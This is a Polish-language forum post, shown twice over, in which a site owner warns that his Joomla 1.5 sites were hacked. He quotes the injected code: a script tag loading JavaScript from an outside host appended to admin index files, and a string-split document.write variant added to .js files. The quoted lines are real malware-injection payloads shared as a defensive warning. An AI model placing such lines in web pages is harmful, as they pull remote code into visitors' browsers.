Eddie69
10-07-2010, 15:55
Witam,
Ostatnio na dwie moje witryny postawione na Joomla 1.5.x na dwóch różnych serwerach, ktoś przypuścił atak. Objawia się to blokowaniem dostępu przez antyvira, bo znajduje albo trojana albo robaka.
Problem leży w tym że w katalogu admina we wszystkich plikach index.php i index.html na końcu dopisany jest kod:
<script type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/xxx.js"></script>
<!--2577a01bf2a998bacdd5dc9a781b2f35-->
natomiast w plikach *.js dopisane jest:
document.write('<s'+'cript type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/xxx.js"></scr'+'ipt>');
Zabezpieczajcie zaplecze, bo później roboty jest co nie miara aby to badziewie wywalić.
Pozdrawiam
Ostatnio na dwie moje witryny postawione na Joomla 1.5.x na dwóch różnych serwerach, ktoś przypuścił atak. Objawia się to blokowaniem dostępu przez antyvira, bo znajduje albo trojana albo robaka.
Problem leży w tym że w katalogu admina we wszystkich plikach index.php i index.html na końcu dopisany jest kod:
<script type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/xxx.js"></script>
<!--2577a01bf2a998bacdd5dc9a781b2f35-->
natomiast w plikach *.js dopisane jest:
document.write('<s'+'cript type="text/javascript" src="http://quest.fairwaydrycleaning.com:8080/xxx.js"></scr'+'ipt>');
Zabezpieczajcie zaplecze, bo później roboty jest co nie miara aby to badziewie wywalić.
Pozdrawiam